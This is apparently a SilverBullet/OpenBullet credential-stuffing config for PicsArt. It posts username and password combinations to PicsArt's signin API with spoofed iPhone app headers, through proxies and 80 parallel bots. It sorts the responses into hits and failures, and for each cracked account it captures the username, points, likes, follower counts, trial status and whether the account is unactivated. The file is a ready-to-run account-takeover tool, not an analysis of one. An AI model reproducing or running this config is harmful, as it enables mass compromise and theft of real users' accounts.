[SETTINGS]
{
  "Name": "PicsArt",
  "SuggestedBots": 80,
  "MaxCPM": 0,
  "LastModified": "2022-06-07T10:50:04.3876595+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Astronot",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "PicsArt",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#POST REQUEST POST "https://api.picsart.com/users/signin.json" 
  CONTENT "{\"password\":\"<PASS>\",\"username\":\"<USER>\",\"provider\":\"picsart\",\"appsflyer_id\":\"1635000076526-0492073\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: api.picsart.com" 
  HEADER "Lat-Long: 33.8333:35.8333" 
  HEADER "User-Agent: PicsArt-10.x" 
  HEADER "Install-Date: 1635001109916" 
  HEADER "App_version: Version 18.3.5" 
  HEADER "Market: apple" 
  HEADER "Language-Code: en" 
  HEADER "Is-Tablet: 0" 
  HEADER "Ray_id: F0492073-74CD-45B0-B860-054556B4C78C_1635001140191" 
  HEADER "Country-Code: lb" 
  HEADER "Content-Length: 112" 
  HEADER "Versioncode: 18305" 
  HEADER "Deviceid: a4ac39c9-9b2d-40e8-ba59-5679abc869f2" 
  HEADER "Platform: apple" 
  HEADER "Accept-Language: en-LB;q=1, ar-LB;q=0.9" 
  HEADER "Device-Model: iPhone 11" 
  HEADER "Network: WIFI" 
  HEADER "Accept: application/picsart-3.0+json" 
  HEADER "Content-Type: application/json" 
  HEADER "Os-Version: 14.7.1" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "App: com.picsart.studio" 

#KONTROL KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "incorrect_password" 
    KEY "\"status\":\"error\"," 
  KEYCHAIN Success OR 
    KEY "{\"status\":\"success\"," 
    KEY "\"message\":\"Updated successfully\"" 

#username PARSE "<SOURCE>" LR "\"username\":\"" "\"," CreateEmpty=FALSE -> CAP "username" 

#PUAN PARSE "<SOURCE>" LR "\"points\":" ",\"" CreateEmpty=FALSE -> CAP "Puan" 

#like PARSE "<SOURCE>" JSON "likes_count" CreateEmpty=FALSE -> CAP "like" 

#Takipçi_Sayısı PARSE "<SOURCE>" JSON "followers_count" CreateEmpty=FALSE -> CAP "Takipçi Sayısı" 

#Takip_edilenler PARSE "<SOURCE>" JSON "following_count" CreateEmpty=FALSE -> CAP "Takip Edilenler" 

#Deneme PARSE "<SOURCE>" JSON "is_trial_used" CreateEmpty=FALSE -> CAP "Deneme Kullanılmışmı?" 

#custom KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"is_activated\":false,\"" 

